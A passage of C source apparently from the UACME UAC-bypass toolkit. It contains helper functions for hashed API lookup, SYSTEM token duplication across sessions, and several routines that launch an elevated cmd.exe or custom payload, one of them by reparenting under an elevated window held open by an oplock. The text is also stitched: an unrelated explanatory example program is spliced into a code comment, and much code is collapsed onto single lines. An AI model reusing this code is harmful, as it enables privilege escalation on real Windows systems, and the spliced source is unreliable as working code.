                // NtUnmapViewOfSection takes the mapped view base, not the
                // section handle; passing hSection fails and leaks the view.
                //
                NtUnmapViewOfSection(NtCurrentProcess(), SectionBuffer);
                //
                // Validate data. The CRC32 below guards against a torn or
                // corrupted block, not against a forged one: it is not an
                // authenticity check and does not replace the ACL on the section.
// Crc32 = sharedParameters.Crc32; sharedParameters.Crc32 = 0; if (Crc32 == RtlComputeCrc32(0, &sharedParameters, sizeof(UACME_PARAM_BLOCK))) { sharedParameters.Crc32 = Crc32; RtlCopyMemory(SharedParameters, &sharedParameters, sizeof(UACME_PARAM_BLOCK)); bResult = TRUE; } } NtClose(hSection); } NtClose(hNamespace); } while (FALSE); return bResult; } /* * ucmSetCompletion * * Purpose: * * Notify Akagi about task completion. * */ VOID ucmSetCompletion( _In_ LPWSTR lpEvent ) { HANDLE hEvent = NULL, hNamespace = NULL; UNICODE_STRING usName; OBJECT_ATTRIBUTES obja; hNamespace = ucmOpenAkagiNamespace(); if (hNamespace) { RtlInitUnicodeString(&usName, lpEvent); InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL); if (NT_SUCCESS(NtOpenEvent(&hEvent, EVENT_ALL_ACCESS, &obja))) { NtSetEvent(hEvent, NULL); NtClose(hEvent); } NtClose(hNamespace); } } /* * ucmPrivilegeEnabled * * Purpose: * * Tests if the given token has the given privilege enabled/enabled by default. * */ BOOLEAN ucmPrivilegeEnabled( _In_ HANDLE hToken, _In_ ULONG Privilege ) { NTSTATUS status; PRIVILEGE_SET Privs; BOOLEAN bResult = FALSE; Privs.Control = PRIVILEGE_SET_ALL_NECESSARY; Privs.PrivilegeCount = 1; Privs.Privilege[0].Luid.LowPart = Privilege; Privs.Privilege[0].Luid.HighPart = 0; Privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED; status = NtPrivilegeCheck(hToken, &Privs, &bResult); RtlSetLastWin32Error(RtlNtStatusToDosError(status)); return bResult; } /* * ucmFormatTimeOut * * Purpose: * * Translates a Win32 style timeout to an NT relative timeout. * */ PLARGE_INTEGER ucmFormatTimeOut( _Out_ PLARGE_INTEGER TimeOut, _In_ DWORD Milliseconds ) { if ((LONG)Milliseconds == -1) { return(NULL); } TimeOut->QuadPart = UInt32x32To64(Milliseconds, 10000); TimeOut->QuadPart *= -1; return TimeOut; } /* * ucmSleep * * Purpose: * * Win32 Sleep replacement. 
*
*/
VOID ucmSleep(
    _In_ DWORD Milliseconds
)
{
    LARGE_INTEGER liDueTime;

    if (Milliseconds == INFINITE) {
        //
        // Most negative relative interval, treated as an infinite delay.
        //
        liDueTime.QuadPart = 0x8000000000000000;
    }
    else {
        ucmFormatTimeOut(&liDueTime, Milliseconds);
    }

    NtDelayExecution(FALSE, &liDueTime);
}

/*
* ucmCreateSyncMutant
*
* Purpose:
*
* Create sync mutex.
*
*/
NTSTATUS ucmCreateSyncMutant(
    _Out_ PHANDLE phMutant
)
{
    UNICODE_STRING usName;
    OBJECT_ATTRIBUTES obja;
    WCHAR szObjectName[256];
    WCHAR szName[128];

    RtlSecureZeroMemory(&szName, sizeof(szName));
    _strcpy(szObjectName, L"\\BaseNamedObjects\\");
    ucmGenerateSharedObjectName(FUBUKI_SYNC_MUTEX_ID, szName);
    _strcat(szObjectName, szName);

    RtlInitUnicodeString(&usName, szObjectName);
    InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);
    return NtCreateMutant(phMutant, MUTANT_ALL_ACCESS, &obja, FALSE);
}

/*
* ucmGetHashForString
*
* Purpose:
*
* Calculates specific hash for string: for each byte, h ^= byte; h = ROL32(h, 3) + 1.
*
*/
DWORD ucmGetHashForString(
    _In_ char* s
)
{
    DWORD h = 0;

    while (*s != 0) {
        h ^= *s;
        h = RotateLeft32(h, 3) + 1;
        s++;
    }
    return h;
}

/*
* ucmGetProcedureAddressByHash
*
* Purpose:
*
* Return pointer to function in dll from name hash value.
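As an added example written for this page (not UACME code), the same ROL-3 hash applied
to a constructed export name table, so the lookup can be exercised without a PE image:
ucm_hash_string performs the same operation as ucmGetHashForString (the page reads
through a signed char, which only differs for bytes above 0x7F; export names are ASCII),
and find_export_by_hash does what the loop over AddressOfNames and
AddressOfNameOrdinals below does, on plain arrays. EXPORT_TABLE, name_for_hash, the
ordinal order and the RVAs are constructed for the example; the three names are real
kernel32 export names. name_for_hash is the reverse direction an analyst needs: given a
hash constant recovered from a sample, hashing candidate API names tells which import it
resolves.

```c
// Added example (not UACME code): export resolution by name hash on a
// constructed export table, plus the reverse lookup used when analysing a sample.
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static uint32_t rotl32(uint32_t v, unsigned n)
{
    return (v << n) | (v >> (32 - n));
}

// Same operation as ucmGetHashForString: h ^= c; h = ROL32(h, 3) + 1.
// Bytes are taken unsigned here; the page's signed-char read only differs
// for bytes above 0x7F, which do not occur in export names.
uint32_t ucm_hash_string(const char *s)
{
    uint32_t h = 0;
    for (; *s != 0; s++) {
        h ^= (uint8_t)*s;
        h = rotl32(h, 3) + 1;
    }
    return h;
}

// Constructed stand-in for the three parallel arrays of IMAGE_EXPORT_DIRECTORY.
typedef struct {
    const char **names;          // AddressOfNames, already resolved to strings
    const uint16_t *ordinals;    // AddressOfNameOrdinals
    const uint32_t *functions;   // AddressOfFunctions (RVAs)
    size_t number_of_names;
} EXPORT_TABLE;

// Mirrors ucmGetProcedureAddressByHash: walk the name table, hash each name,
// and index AddressOfFunctions through AddressOfNameOrdinals. Returns the RVA,
// or 0 when no name matches (0 is never a valid export RVA).
uint32_t find_export_by_hash(const EXPORT_TABLE *t, uint32_t wanted)
{
    for (size_t i = 0; i < t->number_of_names; i++) {
        if (ucm_hash_string(t->names[i]) == wanted)
            return t->functions[t->ordinals[i]];
    }
    return 0;
}

// Reverse lookup for analysts: which candidate name produces a given hash.
// Returns the index into candidates, or -1 when none matches.
int name_for_hash(const char *const *candidates, size_t count, uint32_t hash)
{
    for (size_t i = 0; i < count; i++)
        if (ucm_hash_string(candidates[i]) == hash)
            return (int)i;
    return -1;
}

// Constructed sample table: real kernel32 export names, made-up ordinal order
// and RVAs. Ordinal i of name i selects functions[ordinals[i]].
static const char *sample_names[] = { "CreateProcessW", "LoadLibraryW", "VirtualAlloc" };
static const uint16_t sample_ordinals[] = { 2, 0, 1 };
static const uint32_t sample_functions[] = { 0x1000, 0x2000, 0x3000 };
static const EXPORT_TABLE sample_table = { sample_names, sample_ordinals, sample_functions, 3 };

int main(void)
{
    uint32_t h = ucm_hash_string("LoadLibraryW");
    printf("hash(LoadLibraryW)=0x%08x rva=0x%x\n", (unsigned)h,
        (unsigned)find_export_by_hash(&sample_table, h));
    printf("name for that hash: %s\n",
        sample_names[name_for_hash(sample_names, 3, h)]);
    return 0;
}
```

Forwarded exports are not handled by either the page's loop or this one: an RVA that
points back into the export directory is a forwarder string, not code.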
* */ LPVOID ucmGetProcedureAddressByHash( _In_ PVOID ImageBase, _In_ DWORD ProcedureHash ) { DWORD i; ULONG sz = 0; IMAGE_DOS_HEADER* DosHeader; IMAGE_EXPORT_DIRECTORY* Exports; PDWORD Names, Functions; PWORD Ordinals; DWORD_PTR FunctionPtr; DosHeader = (IMAGE_DOS_HEADER*)ImageBase; Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_EXPORT, &sz); if (Exports == NULL) return NULL; Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames); Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals); Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions); for (i = 0; i < Exports->NumberOfNames; i++) { if (ucmGetHashForString((char*)((PBYTE)DosHeader + Names[i])) == ProcedureHash) { FunctionPtr = Functions[Ordinals[i]]; return (PBYTE)ImageBase + FunctionPtr; } } return NULL; } /* * ucmGetStartupInfo * * Purpose: * * Reimplemented GetStartupInfoW. * */ VOID ucmGetStartupInfo( _In_ LPSTARTUPINFOW lpStartupInfo ) { PRTL_USER_PROCESS_PARAMETERS ProcessParameters; if (lpStartupInfo == NULL) { return; } ProcessParameters = NtCurrentPeb()->ProcessParameters; lpStartupInfo->cb = sizeof(*lpStartupInfo); lpStartupInfo->lpReserved = (LPWSTR)ProcessParameters->ShellInfo.Buffer; lpStartupInfo->lpDesktop = (LPWSTR)ProcessParameters->DesktopInfo.Buffer; lpStartupInfo->lpTitle = (LPWSTR)ProcessParameters->WindowTitle.Buffer; lpStartupInfo->dwX = ProcessParameters->StartingX; lpStartupInfo->dwY = ProcessParameters->StartingY; lpStartupInfo->dwXSize = ProcessParameters->CountX; lpStartupInfo->dwYSize = ProcessParameters->CountY; lpStartupInfo->dwXCountChars = ProcessParameters->CountCharsX; lpStartupInfo->dwYCountChars = ProcessParameters->CountCharsY; lpStartupInfo->dwFillAttribute = ProcessParameters->FillAttribute; lpStartupInfo->dwFlags = ProcessParameters->WindowFlags; lpStartupInfo->wShowWindow = (WORD)ProcessParameters->ShowWindowFlags; lpStartupInfo->cbReserved2 = 
ProcessParameters->RuntimeData.Length; lpStartupInfo->lpReserved2 = (LPBYTE)ProcessParameters->RuntimeData.Buffer; if (lpStartupInfo->dwFlags & (STARTF_USESTDHANDLES | STARTF_USEHOTKEY)) { lpStartupInfo->hStdInput = ProcessParameters->StandardInput; lpStartupInfo->hStdOutput = ProcessParameters->StandardOutput; lpStartupInfo->hStdError = ProcessParameters->StandardError; } } /* * ucmExpandEnvironmentStrings * * Purpose: * * Reimplemented ExpandEnvironmentStrings. * */ DWORD ucmExpandEnvironmentStrings( _In_ LPCWSTR lpSrc, _Out_writes_to_opt_(nSize, return) LPWSTR lpDst, _In_ DWORD nSize ) { NTSTATUS Status; SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize; if (lpSrc) { SrcLength = _strlen(lpSrc); } Status = RtlExpandEnvironmentStrings( NULL, (PWSTR)lpSrc, SrcLength, (PWSTR)lpDst, DstLength, &ReturnLength); if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) { if (ReturnLength <= MAXDWORD32) return (DWORD)ReturnLength; Status = STATUS_UNSUCCESSFUL; } RtlSetLastWin32Error(RtlNtStatusToDosError(Status)); return 0; } #define SI_MAX_BUFFER_LENGTH (512 * 1024 * 1024) /* * ucmGetSystemInfo * * Purpose: * * Returns buffer with system information by given InfoClass. * * Returned buffer must be freed with HeapFree after usage. 
* */ PVOID ucmGetSystemInfo( _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass ) { PVOID buffer = NULL; ULONG bufferSize = PAGE_SIZE; NTSTATUS ntStatus; ULONG returnedLength = 0; buffer = ucmxHeapAlloc((SIZE_T)bufferSize); if (buffer == NULL) return NULL; while ((ntStatus = NtQuerySystemInformation( SystemInformationClass, buffer, bufferSize, &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH) { ucmxHeapFree(buffer); bufferSize *= 2; if (bufferSize > SI_MAX_BUFFER_LENGTH) return NULL; buffer = ucmxHeapAlloc((SIZE_T)bufferSize); if (buffer == NULL) return NULL; } if (NT_SUCCESS(ntStatus)) { return buffer; } if (buffer) ucmxHeapFree(buffer); return NULL; } /* * ucmLaunchPayload * * Purpose: * * Run payload (by default cmd.exe from system32) * */ BOOL ucmLaunchPayload( _In_opt_ LPWSTR pszPayload, _In_opt_ DWORD cbPayload) { BOOL bResult = FALSE, bCommandLineAllocated = FALSE; WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line WCHAR sysdir[MAX_PATH + 1]; //process working directory STARTUPINFO startupInfo; PROCESS_INFORMATION processInfo; DWORD dwCreationFlags = CREATE_NEW_CONSOLE; LPWSTR lpApplicationName = NULL, lpCommandLine = NULL; SIZE_T memIO; // // Query working directory. // RtlSecureZeroMemory(sysdir, sizeof(sysdir)); ucmxQuerySystemDirectory(sysdir, TRUE); // // Query startup info from parent. // RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo)); startupInfo.cb = sizeof(startupInfo); ucmGetStartupInfo(&startupInfo); // // Determine what we want to execute, custom parameter or default cmd.exe // if (pszPayload && cbPayload) { // // We can use custom payload, copy it to internal buffer. // memIO = PAGE_SIZE + (SIZE_T)cbPayload; lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO); if (lpCommandLine) { dwCreationFlags = 0; bCommandLineAllocated = TRUE; RtlCopyMemory(lpCommandLine, pszPayload, cbPayload); } } else { // // Default cmd.exe should be started. 
// RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); _strcpy(cmdbuf, sysdir); _strcat(cmdbuf, L"cmd.exe"); lpApplicationName = cmdbuf; lpCommandLine = NULL; bCommandLineAllocated = FALSE; } startupInfo.dwFlags = STARTF_USESHOWWINDOW; startupInfo.wShowWindow = SW_SHOW; RtlSecureZeroMemory(&processInfo, sizeof(processInfo)); #ifdef _TRACE_CALL OutputDebugString(L"CreateProcessAsUser\r\n"); #endif // // Launch payload. // bResult = CreateProcessAsUser(NULL, lpApplicationName, lpCommandLine, NULL, NULL, FALSE, dwCreationFlags, NULL, sysdir, &startupInfo, &processInfo); if (bResult) { // // We don't need these handles, close them. // NtClose(processInfo.hProcess); NtClose(processInfo.hThread); } // // Post execution cleanup if required. // if (bCommandLineAllocated) ucmxHeapFree(lpCommandLine); return bResult; } /* * ucmLaunchPayloadEx * * Purpose: * * Run payload (by default cmd.exe from system32) * */ BOOL ucmLaunchPayloadEx( _In_ PFNCREATEPROCESSW pCreateProcess, _In_opt_ LPWSTR pszPayload, _In_opt_ DWORD cbPayload) { BOOL bResult = FALSE, bCommandLineAllocated = FALSE; WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line WCHAR sysdir[MAX_PATH + 1]; //process working directory STARTUPINFO startupInfo; PROCESS_INFORMATION processInfo; DWORD dwCreationFlags = CREATE_NEW_CONSOLE; LPWSTR lpApplicationName = NULL, lpCommandLine = NULL; SIZE_T memIO; if (pCreateProcess == NULL) return bResult; // // Query working directory. // RtlSecureZeroMemory(sysdir, sizeof(sysdir)); ucmxQuerySystemDirectory(sysdir, TRUE); // // Query startup info from parent. // RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo)); startupInfo.cb = sizeof(startupInfo); ucmGetStartupInfo(&startupInfo); // // Determine what we want to execute, custom parameter or default cmd.exe // if (pszPayload && cbPayload) { // // We can use custom payload, copy it to internal buffer. 
// memIO = PAGE_SIZE + (SIZE_T)cbPayload; lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO); if (lpCommandLine) { dwCreationFlags = 0; bCommandLineAllocated = TRUE; RtlCopyMemory(lpCommandLine, pszPayload, cbPayload); } } else { // // Default cmd.exe should be started. // RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); _strcpy(cmdbuf, sysdir); _strcat(cmdbuf, L"cmd.exe"); lpApplicationName = cmdbuf; lpCommandLine = NULL; bCommandLineAllocated = FALSE; } startupInfo.dwFlags = STARTF_USESHOWWINDOW; startupInfo.wShowWindow = SW_SHOW; RtlSecureZeroMemory(&processInfo, sizeof(processInfo)); // // Launch payload. // bResult = pCreateProcess( lpApplicationName, lpCommandLine, NULL, NULL, FALSE, dwCreationFlags, NULL, sysdir, &startupInfo, &processInfo); if (bResult) { // // We don't need these handles, close them. // NtClose(processInfo.hProcess); NtClose(processInfo.hThread); } // // Post execution cleanup if required. // if (bCommandLineAllocated) ucmxHeapFree(lpCommandLine); return bResult; } /* * ucmLaunchPayload2 * * Purpose: * * Run payload (by default cmd.exe from system32) * */ BOOL ucmLaunchPayload2( _In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser, _In_ BOOL bIsLocalSystem, _In_ ULONG SessionId, _In_opt_ LPWSTR pszPayload, _In_opt_ DWORD cbPayload) { BOOL bResult = FALSE, bCommandLineAllocated = FALSE, bSrvExec = FALSE; WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line WCHAR sysdir[MAX_PATH + 1]; //process working directory STARTUPINFO startupInfo; PROCESS_INFORMATION processInfo; DWORD dwCreationFlags = CREATE_NEW_CONSOLE; LPWSTR lpApplicationName = NULL, lpCommandLine = NULL; SIZE_T memIO; NTSTATUS status; HANDLE hToken = NULL, hDupToken = NULL; SECURITY_QUALITY_OF_SERVICE sqos; OBJECT_ATTRIBUTES obja; ULONG CurrentSessionId = NtCurrentPeb()->SessionId; #ifdef _TRACE_CALL WCHAR szDebugBuf[1000]; #endif //_TRACE_CALL do { bSrvExec = ((bIsLocalSystem) && (CurrentSessionId != SessionId)); #ifdef _TRACE_CALL if (bSrvExec) OutputDebugString(L"bServExec"); #endif 
//_TRACE_CALL // // In case of service start, prepare token for CreateProcessAsUser. // Set token session id, to do this we need SE_TCB_PRIVILEGE, check it enabled. // if (bSrvExec) { status = NtOpenProcessToken( NtCurrentProcess(), TOKEN_ALL_ACCESS, &hToken); if (!NT_SUCCESS(status)) { #ifdef _TRACE_CALL _strcpy(szDebugBuf, L"NtOpenProcessToken = 0x"); ultohex(status, _strend(szDebugBuf)); _strcat(szDebugBuf, L"\r\n"); OutputDebugString(szDebugBuf); #endif //_TRACE_CALL break; } #ifdef _TRACE_CALL if (!ucmPrivilegeEnabled(hToken, SE_ASSIGNPRIMARYTOKEN_PRIVILEGE)) { OutputDebugString(L"ucmPrivilegeEnabled->SE_ASSIGNPRIMARYTOKEN_PRIVILEGE not set\r\n"); } #endif //_TRACE_CALL if (!ucmPrivilegeEnabled(hToken, SE_TCB_PRIVILEGE)) { #ifdef _TRACE_CALL OutputDebugString(L"ucmPrivilegeEnabled->SE_TCB_PRIVILEGE not set\r\n"); #endif //_TRACE_CALL break; } sqos.Length = sizeof(SECURITY_QUALITY_OF_SERVICE); sqos.ImpersonationLevel = SecurityImpersonation; sqos.ContextTrackingMode = 0; sqos.EffectiveOnly = FALSE; InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL); obja.SecurityQualityOfService = &sqos; status = NtDuplicateToken( hToken, TOKEN_ALL_ACCESS, &obja, FALSE, TokenPrimary, &hDupToken); if (!NT_SUCCESS(status)) { #ifdef _TRACE_CALL _strcpy(szDebugBuf, L"NtDuplicateToken = 0x"); ultohex(status, _strend(szDebugBuf)); _strcat(szDebugBuf, L"\r\n"); OutputDebugString(szDebugBuf); #endif //_TRACE_CALL break; } status = NtSetInformationToken( hDupToken, TokenSessionId, (PVOID)&SessionId, sizeof(ULONG)); if (!NT_SUCCESS(status)) { #ifdef _TRACE_CALL _strcpy(szDebugBuf, L"NtSetInformationToken = 0x"); ultohex(status, _strend(szDebugBuf)); _strcat(szDebugBuf, L"\r\n"); OutputDebugString(szDebugBuf); #endif //_TRACE_CALL break; } } else { // // Not a service start, use default token value. // hDupToken = NULL; } // // Query working directory. 
// RtlSecureZeroMemory(sysdir, sizeof(sysdir)); ucmxQuerySystemDirectory(sysdir, FALSE); #ifdef _TRACE_CALL OutputDebugString(sysdir); #endif //_TRACE_CALL // // Query startup info from parent. // RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo)); startupInfo.cb = sizeof(startupInfo); ucmGetStartupInfo(&startupInfo); // // Determine what we want to execute, custom parameter or default cmd.exe // if (pszPayload && cbPayload) { // // We can use custom payload, copy it to internal buffer. // memIO = PAGE_SIZE + (SIZE_T)cbPayload; lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO); if (lpCommandLine) { dwCreationFlags = 0; bCommandLineAllocated = TRUE; RtlCopyMemory(lpCommandLine, pszPayload, cbPayload); } } else { // // Default cmd.exe should be started. // RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); _strcpy(cmdbuf, sysdir); _strcat(cmdbuf, L"cmd.exe"); lpApplicationName = cmdbuf; lpCommandLine = NULL; bCommandLineAllocated = FALSE; } startupInfo.dwFlags = STARTF_USESHOWWINDOW; startupInfo.wShowWindow = SW_SHOW; RtlSecureZeroMemory(&processInfo, sizeof(processInfo)); // // In case of start from service, force default WinStation and Desktop. // // Future note: maybe moved to registry settings as custom winsta param. // if (bSrvExec) { startupInfo.lpDesktop = TEXT("Winsta0\\Default"); } // // Launch payload. // bResult = pCreateProcessAsUser( hDupToken, lpApplicationName, lpCommandLine, NULL, NULL, FALSE, dwCreationFlags, NULL, sysdir, &startupInfo, &processInfo); if (bResult) { #ifdef _TRACE_CALL OutputDebugString(L"CreateProcessAsUser success\r\n"); #endif //_TRACE_CALL // // We don't need these handles, close them. // NtClose(processInfo.hProcess); NtClose(processInfo.hThread); } #ifdef _TRACE_CALL else { _strcpy(szDebugBuf, L"CreateProcessAsUser failed with code = 0x"); ultohex(GetLastError(), _strend(szDebugBuf)); _strcat(szDebugBuf, L"\r\n"); OutputDebugString(szDebugBuf); } #endif //_TRACE_CALL } while (FALSE); // // Post execution cleanup if required. 
// if (bCommandLineAllocated) ucmxHeapFree(lpCommandLine); if (bSrvExec) { if (hToken) NtClose(hToken); if (hDupToken) NtClose(hDupToken); } return bResult; } /* * ucmLaunchPayload3 * * Purpose: * * Run payload (by default cmd.exe from system32) * */ BOOL ucmLaunchPayload3( _In_opt_ LPWSTR pszPayload, _In_opt_ DWORD cbPayload) { BOOL bResult = FALSE, bCommandLineAllocated = FALSE; ULONG i; HWND hwnd; HANDLE hProcess; LPWSTR lpCommandLine = NULL; SIZE_T memIO; OPLOCK_FILE_CONTEXT ofc; PROCESS_INFORMATION pi; WCHAR cmdbuf[MAX_PATH * 2]; //complete process command line WCHAR sysdir[MAX_PATH + 1]; //process working directory if (ucmCheckUIAccessPermissions()) { // // Determine what we want to execute, custom parameter or default cmd.exe // if (pszPayload && cbPayload) { // // We can use custom payload, copy it to internal buffer. // memIO = PAGE_SIZE + (SIZE_T)cbPayload; lpCommandLine = (LPWSTR)ucmxHeapAlloc(memIO); if (lpCommandLine) { bCommandLineAllocated = TRUE; RtlCopyMemory(lpCommandLine, pszPayload, cbPayload); } } else { // // Default cmd.exe should be started. // RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf)); // // Query working directory. 
            //
            RtlSecureZeroMemory(sysdir, sizeof(sysdir));
            ucmxQuerySystemDirectory(sysdir, FALSE);

            _strcpy(cmdbuf, sysdir);
            _strcat(cmdbuf, L"cmd.exe");
            lpCommandLine = cmdbuf;
            bCommandLineAllocated = FALSE;
        }

        RtlSecureZeroMemory(&ofc, sizeof(ofc));
        ofc.Length = sizeof(ofc);
        ofc.FileHandle = INVALID_HANDLE_VALUE;

        hwnd = ucmFindFirstElevatedWindow();
        if (!hwnd) {
            //
            // No elevated window yet: start one held open by the oplock and
            // poll for it for up to 5 seconds, stopping as soon as it appears.
            //
            if (ucmStartBackupLockedElevatedProcess(&ofc)) {
                for (i = 0; i < 5000; i += 500) {
                    ucmSleep(500);
                    hwnd = ucmFindFirstElevatedWindow();
                    if (hwnd)
                        break;
                }
            }
        }

        if (hwnd) {
            RtlSecureZeroMemory(&pi, sizeof(pi));
            hProcess = ucmGetHwndFullProcessHandle(hwnd);
            if (hProcess) {
                bResult = ucmCreateProcessWithParent(lpCommandLine, hProcess, CREATE_NEW_CONSOLE, SW_SHOW, &pi);
                if (bResult) {
                    CloseHandle(pi.hThread);
                    CloseHandle(pi.hProcess);
                }
                CloseHandle(hProcess);
            }
        }

        if (ofc.FileHandle != INVALID_HANDLE_VALUE) {
            ucmReleaseOpLock(&ofc);
        }
    }

    //
    // Post execution cleanup if required.
    //
    if (bCommandLineAllocated)
        ucmxHeapFree(lpCommandLine);

    return bResult;
}

/*
* ucmQueryRuntimeInfo
*
* Purpose:
*
* Output current process runtime information.
*
*/
LPWSTR ucmQueryRuntimeInfo(
    _In_ BOOL ReturnData)
{
    BOOL bFound = FALSE;
    NTSTATUS status;
    DWORD dwIntegrityLevel;
    ULONG LengthNeeded = 0;
    ULONG SessionId = NtCurrentPeb()->SessionId;
    HANDLE hToken = NULL;
    PTOKEN_MANDATORY_LABEL pTIL = NULL;
    TOKEN_USER* ptu = NULL;
    PROCESS_BASIC_INFORMATION pbi;
    PROCESS_EXTENDED_BASIC_INFORMATION pebi;
    PSYSTEM_PROCESS_INFORMATION ProcessList, pList;
    LSA_OBJECT_ATTRIBUTES lobja;
    LSA_HANDLE PolicyHandle = NULL;
    PLSA_REFERENCED_DOMAIN_LIST ReferencedDomains = NULL;
    PLSA_TRANSLATED_NAME Names = NULL;
    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    LPWSTR lpReport, lpValue = TEXT("Unknown");
    WCHAR szBuffer[MAX_PATH + 1];

    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    if (GetModuleFileName(NULL, (LPWSTR)&szBuffer, MAX_PATH) == 0)
        return NULL;

    lpReport = (LPWSTR)ucmxHeapAlloc(2 * PAGE_SIZE);
    if (lpReport == NULL)
        return NULL;

    //
    // 1. Attach module name.
    //
    _strncpy(lpReport, MAX_PATH, szBuffer, MAX_PATH);

    //
    // 2. Inherited from.
    //
    RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));
    status = NtQueryInformationProcess(
        NtCurrentProcess(),
        ProcessBasicInformation,
        &pbi,
        sizeof(PROCESS_BASIC_INFORMATION),
        &LengthNeeded);

    if (NT_SUCCESS(status)) {
        _strcpy(szBuffer, TEXT("\r\nInherited from PID="));
#ifdef _WIN64
        u64tostr(pbi.InheritedFromUniqueProcessId, _strend(szBuffer));
#else
        ultostr((ULONG)pbi.InheritedFromUniqueProcessId, _strend(szBuffer));
#endif
        _strcat(lpReport, szBuffer);
        _strcat(lpReport, TEXT(" ("));

        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        bFound = FALSE;

        ProcessList = (PSYSTEM_PROCESS_INFORMATION)ucmGetSystemInfo(SystemProcessInformation);
        if (ProcessList) {
            pList = ProcessList;
            for (;;) {
                if ((ULONG_PTR)pList->UniqueProcessId == pbi.InheritedFromUniqueProcessId) {
                    _strncpy(szBuffer, MAX_PATH,
                        pList->ImageName.Buffer,
                        pList->ImageName.Length / sizeof(WCHAR));
                    bFound = TRUE;
                    break;
                }
                if (pList->NextEntryDelta == 0) {
                    break;
                }
                pList = (PSYSTEM_PROCESS_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);
            }
            ucmxHeapFree(ProcessList);
        }

        if (bFound) {
            _strcat(lpReport, szBuffer);
        }
        else {
            //
            // The parent may have exited and its id may have been reused;
            // this only says no running process has that id now.
            //
            _strcat(lpReport, TEXT("Non-existent Process"));
        }

        _strcat(lpReport, TEXT(")"));
    }

    //
    // 3. Query various token related data.
    //
    //
    // 3.1 Integrity value.
// 3.2 User\Domain name // 3.3 Session info // status = NtOpenProcessToken( NtCurrentProcess(), TOKEN_QUERY, &hToken); if (NT_SUCCESS(status)) { LengthNeeded = 0; status = NtQueryInformationToken( hToken, TokenIntegrityLevel, NULL, 0, &LengthNeeded); if (status == STATUS_BUFFER_TOO_SMALL) { pTIL = (PTOKEN_MANDATORY_LABEL)ucmxHeapAlloc(LengthNeeded); if (pTIL) { status = NtQueryInformationToken( hToken, TokenIntegrityLevel, pTIL, LengthNeeded, &LengthNeeded); if (NT_SUCCESS(status)) { dwIntegrityLevel = *RtlSubAuthoritySid(pTIL->Label.Sid, (DWORD)(UCHAR)(*RtlSubAuthorityCountSid(pTIL->Label.Sid) - 1)); if (dwIntegrityLevel == SECURITY_MANDATORY_UNTRUSTED_RID) { lpValue = L"UntrustedIL"; } else if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) { lpValue = L"LowIL"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) //skip SECURITY_MANDATORY_MEDIUM_PLUS_RID { lpValue = L"MediumIL"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID && dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID) { lpValue = L"HighIL"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID && dwIntegrityLevel < SECURITY_MANDATORY_PROTECTED_PROCESS_RID) { lpValue = L"SystemIL"; } else if (dwIntegrityLevel >= SECURITY_MANDATORY_PROTECTED_PROCESS_RID) { lpValue = L"ProtectedProcessIL"; } _strcpy(szBuffer, TEXT("\r\nPID=")); ultostr((ULONG)GetCurrentProcessId(), _strend(szBuffer)); _strcat(szBuffer, TEXT(", ")); _strncpy(_strend(szBuffer), 40, lpValue, 40); _strcat(lpReport, szBuffer); } ucmxHeapFree(pTIL); } } // // Domain\User name. 
// LengthNeeded = 0; status = NtQueryInformationToken( hToken, TokenUser, NULL, 0, &LengthNeeded); if (status == STATUS_BUFFER_TOO_SMALL) { ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded); if (ptu) { status = NtQueryInformationToken( hToken, TokenUser, ptu, LengthNeeded, &LengthNeeded); if (NT_SUCCESS(status)) { SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE); SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation; SecurityQualityOfService.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING; SecurityQualityOfService.EffectiveOnly = FALSE; InitializeObjectAttributes( &lobja, NULL, 0L, NULL, NULL); lobja.SecurityQualityOfService = &SecurityQualityOfService; status = LsaOpenPolicy( NULL, &lobja, POLICY_LOOKUP_NAMES, &PolicyHandle); if (NT_SUCCESS(status)) { status = LsaLookupSids( PolicyHandle, 1, &ptu->User.Sid, &ReferencedDomains, &Names); if ((NT_SUCCESS(status)) && (status != STATUS_SOME_NOT_MAPPED)) { if (ReferencedDomains != NULL) { szBuffer[0] = 0; _strncpy( 